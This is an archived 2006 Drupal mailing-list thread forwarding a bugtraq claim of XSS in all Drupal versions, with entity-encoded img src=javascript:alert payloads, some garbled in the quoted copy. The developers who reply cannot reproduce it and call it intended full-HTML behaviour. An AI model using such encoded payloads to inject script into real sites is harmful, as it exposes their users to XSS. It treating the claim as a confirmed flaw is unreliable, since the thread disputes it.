[liz0@bsdmail.com: Drupal all versiyon xss cehennem.org] - Development - lists.drupal.org

newer
the new standard RSS icon

[liz0@bsdmail.com: Drupal all versiyon xss cehennem.org]

older
fixed vs closed

piotr＠mallorn.ii.uj.edu.pl

3 Jan 2006 3 Jan '06

9:08 p.m.

This is from bugtraq... -- Piotrek irc: #debian.pl Mors Drosophilis melanogastribus!

Attachments:

attachment.eml (message/rfc822 — 3.5 KB)

Reply

Sign in to reply online Use email software

Show replies by date

Darrel O'Pry

4 Jan 4 Jan

7:37 p.m.

New subject: [development] [liz0@bsdmail.com: Drupal all versiyon xss cehennem.org]

I tried to reproduce this, but was unable to... anyone else have any luck? On Tue, 2006-01-03 at 21:08 +0100, Piotr Krukowiecki wrote:

This is from bugtraq...

email message attachment

...
-------- Forwarded Message -------- From: liz0@bsdmail.com To: bugtraq@securityfocus.com Subject: Drupal all versiyon xss cehennem.org Date: 2 Jan 2006 10:45:25 -0000

Drupal all versiyon xss ---------------------------------------------------- site:http://www.drupal.org

Hex, Base64, Decimal site: http://liz0zim.no-ip.org/code.php --------------------------------------------------

img tag : on

---------------------------------------------------------------------------------------------------------------------------------------------------------------------

Decimal Value: HTML (without semicolons)

<img src=javascript:alert('XSS')> = <img src=javascript:alert('XSS')> --------------------------------------------------------------------------------------------------------------------------------------------------------------- Decimal Value: HTML (with semicolons)

<img src=javascript:alert('XSS')> = <img src=javascript:alert('XSS')>

--------------------------------------------------------------------------------------------------------------------------------------------------------------- example: post message :<img src=javascript:alert('XSS')> not Vulnerable but <img src=javascript:alert('XSS')> Vulnerable

post mesage :<img src=javascript:alert('XSS')> not Vulnerable but <img src=javascript:alert('XSS')> Vulnerable

---------------------------------------------------------

Credit:Liz0ziM mail:liz0@bsdmail.com www.biyo.tk , www.cehennem.org

Gretz:wannacut,The_Bekir,Codexploder'tq,furtivo,R00t3rr0r,disconnect,cyberlord and all friend

----------------------------------------------------------- Source:

http://liz0zim.no-ip.org/drupal.txt

------------------------------------------------------------

Reply

Sign in to reply online Use email software

puregin

5 Jan 5 Jan

2:56 a.m.

New subject: [development] [liz0@bsdmail.com: Drupal all versiyon xss cehennem.org]

As chx pointed out on bugtraq, and on this list, this is not a vulnerability but a 'feature': allowing full HTML in posting means what it says. Let's kill this topic. On 4-Jan-2006, at 1:37 PM, Darrel O'Pry wrote:

I tried to reproduce this, but was unable to... anyone else have any luck?

On Tue, 2006-01-03 at 21:08 +0100, Piotr Krukowiecki wrote:

...
This is from bugtraq...

email message attachment

...
-------- Forwarded Message -------- From: liz0@bsdmail.com To: bugtraq@securityfocus.com Subject: Drupal all versiyon xss cehennem.org Date: 2 Jan 2006 10:45:25 -0000

Drupal all versiyon xss ---------------------------------------------------- site:http://www.drupal.org

Hex, Base64, Decimal site: http://liz0zim.no-ip.org/code.php --------------------------------------------------

img tag : on

-------------------------------------------------------------------- -------------------------------------------------------------------- -----------------------------

Decimal Value: HTML (without semicolons)

<img src=javascript:alert('XSS')> = <img src=javascript:al 1rt('XSS')> -------------------------------------------------------------------- -------------------------------------------------------------------- ----------------------- Decimal Value: HTML (with semicolons)

<img src=javascript:alert('XSS')> = <img src=javascript:a Cert('XSS')>

-------------------------------------------------------------------- -------------------------------------------------------------------- ----------------------- example: post message :<img src=javascript:alert('XSS')> not Vulnerable but <img src=javascript:al 1rt('XSS')> Vulnerable

post mesage :<img src=javascript:alert('XSS')> not Vulnerable but <img src=javascript:a Cert('XSS')> Vulnerable

---------------------------------------------------------

Credit:Liz0ziM mail:liz0@bsdmail.com www.biyo.tk , www.cehennem.org

Gretz:wannacut,The_Bekir,Codexploder'tq,furtivo,R00t3rr0r,disconnect ,cyberlord and all friend

----------------------------------------------------------- Source:

http://liz0zim.no-ip.org/drupal.txt

------------------------------------------------------------

Reply

Sign in to reply online Use email software

7472

Age (days ago)

7474

Last active (days ago)

Download

2 comments

3 participants

tags

participants (3)

Darrel O'Pry
piotr＠mallorn.ii.uj.edu.pl
puregin